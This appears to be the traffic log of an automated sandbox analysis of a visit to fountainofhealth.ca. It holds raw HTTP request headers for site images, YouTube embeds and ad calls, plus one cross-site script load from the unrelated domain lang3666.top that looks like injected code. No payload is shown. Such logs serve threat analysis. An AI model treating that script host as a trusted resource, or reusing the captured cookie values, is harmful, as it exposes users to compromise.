                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /lv/select.js?d1e20ded6adf5a3d55 HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /generate_204?X6C5Ug HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /generate_204?S_CoiQ HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
                                  Source: global trafficHTTP traffic detected: GET /generate_204?HJMx7A HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /eureka/clank/134/cast_sender.js HTTP/1.1host: www.gstatic.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
